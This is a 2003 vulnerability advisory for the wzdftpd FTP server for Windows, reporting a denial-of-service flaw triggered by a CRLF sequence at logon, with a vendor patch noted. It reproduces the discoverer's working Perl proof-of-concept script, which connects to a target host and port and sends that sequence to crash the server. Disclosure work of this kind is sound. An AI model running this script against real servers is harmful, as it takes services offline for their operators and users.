Reported September 23, 2003 by Moran Zavdi.

 

 

VERSIONS AFFECTED

 

WZDftpD's wzdftpd FTP Server for Windows

 

DESCRIPTION

 

A vulnerability in WZDftpD's wzdftpd FTP Server for Windows can result in a Denial of Service (DoS) condition. Sending a CRLF sequence at logon causes an unhandled exception at the server.

 

DEMONSTRATION

 
The discoverer posted the following code as proof of concept:
 

#!/usr/bin/perl

#

#   ###############################

#   #     Proof of concept for         #

#   # WZDFTPD FTP Server version 0.1rc5 #

#   ###############################

#

# http://www.moozatech.com/mt-23-09-2003.txt

#

# Usage: perl mooza1.pl \[host\] \[port\]

use IO::Socket;

 

$host = $ARGV\[0\];

$port = $ARGV\[1\];

print "\n#####################################\n\n";

print "Proof-Of-Concept for wzdftpd v0.1rc5.\n";

print "this code is for demonstration only.\n";

print "Use it under your own responsebility.\n";

print "\n#####################################\n\n";

 

if (defined $host && defined $port ) \{

\} else \{

  print "Oops, Something is missing.\n";

  die "Usage: perl mooza1.pl \[host\] \[port\]\n";

\}

 

print "Connecting to $host:$port... ";

 

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,  Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant

connect?\n";

print "OK\n"; sleep 1; print "Sending Dos..\n"; sleep 2; print

$socket

"\r\n"; $socket->autoflush(1);

 

sleep 2;

print "we are done here..\n\n";

close($socket);

 
 

VENDOR RESPONSE

 

WZDftpD has released a patch for this vulnerability.

 

CREDIT                                                                                                       
Discovered by Moran Zavdi.